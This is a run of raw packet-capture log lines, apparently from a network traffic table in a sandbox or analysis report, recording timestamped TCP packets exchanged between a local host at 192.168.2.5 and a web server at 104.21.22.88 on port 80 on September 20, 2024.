                                                              Sep 20, 2024 12:00:07.355683088 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357492924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357526064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357542038 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357549906 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357563019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357589006 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357604980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357613087 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357623100 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357633114 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357642889 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357667923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357667923 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357685089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357702017 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357709885 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357717037 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357733011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357741117 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357750893 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357767105 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357773066 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357791901 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357804060 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357808113 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357826948 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357842922 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357848883 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357858896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357873917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357881069 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357898951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357909918 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357917070 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357932091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357947111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357955933 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.357971907 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357989073 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.357989073 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.358005047 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358021975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358028889 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.358036995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358063936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358067989 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.358079910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358097076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358103037 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.358115911 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358135939 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.358169079 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358184099 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358208895 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.358223915 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358238935 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358254910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358262062 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.358273029 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358294964 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.358349085 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.358427048 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445214987 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445245981 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445261955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445276976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445291996 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445306063 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445319891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445333958 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445349932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445349932 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445364952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445382118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445382118 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445396900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445411921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445415020 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445429087 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445439100 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445445061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445462942 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445476055 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445478916 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445502043 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445524931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445542097 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445557117 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445564032 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445585966 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445600986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445615053 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445630074 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445636988 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445657015 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445660114 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445676088 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445678949 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445692062 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445707083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445713997 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445724010 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445748091 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445749044 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445775986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445789099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445790052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445806980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445822001 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445827961 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445837975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445852995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445857048 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445869923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445885897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445892096 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445923090 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.445944071 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445960045 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445975065 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.445988894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446002007 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446005106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446026087 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446070910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446111917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446125984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446127892 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446144104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446158886 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446163893 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446176052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446191072 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446193933 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446207047 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446225882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446228027 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446253061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446264982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446268082 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446280003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446295977 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446329117 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446335077 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446348906 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446357965 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446367025 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446381092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446396112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446397066 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446418047 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446444988 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446460962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446475983 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446485043 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446491003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446513891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446515083 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446532011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446547031 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.446552992 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.446583986 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.448348999 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448430061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448446035 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448462009 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448474884 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.448489904 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448503017 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.448508024 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448529005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448554039 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.448559046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448575020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448590994 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448600054 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.448606968 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448628902 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.448677063 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448693991 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448709011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448712111 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.448726892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448874950 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448913097 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.448913097 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.448925018 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448941946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.448982954 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449038982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449054956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449079037 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449094057 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449110031 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449120998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449136019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449141979 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449153900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449160099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449249029 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449265003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449280977 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449295044 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449306011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449317932 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449322939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449347973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449363947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449367046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449388981 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449398994 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449405909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449420929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449436903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449443102 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449453115 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449467897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449471951 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449485064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449500084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449507952 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.449517965 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.449538946 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.491967916 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.535572052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535603046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535619020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535633087 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535649061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535695076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535708904 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535723925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535747051 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535762072 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535777092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535778046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.535801888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535804987 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.535819054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535826921 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.535842896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535849094 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.535857916 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535872936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535878897 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.535896063 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535907030 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.535914898 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535929918 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535943031 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535949945 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.535972118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.535978079 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.535988092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536001921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536016941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536020994 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536031961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536046982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536052942 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536062002 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536081076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536084890 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536106110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536114931 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536130905 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536145926 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536159992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536166906 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536183119 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536190033 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536199093 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536212921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536221027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536241055 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536245108 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536257029 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536262035 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536279917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536293983 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536295891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536312103 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536329985 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536335945 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536351919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536366940 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536381006 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536389112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536401987 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536403894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536426067 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536437988 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536442041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536483049 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536513090 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536529064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536542892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536561012 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536639929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536654949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536669970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536674976 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536684990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536700964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536704063 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536716938 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536731958 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536737919 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.536746979 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.536767006 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.537880898 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.537930965 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.537993908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538007975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538052082 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538064957 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538075924 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.538080931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538095951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538103104 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.538111925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538131952 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.538151026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538165092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538178921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538184881 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.538194895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538217068 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.538269043 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538305044 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.538316011 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.538319111 CEST8049724104.21.22.88192.168.2.5
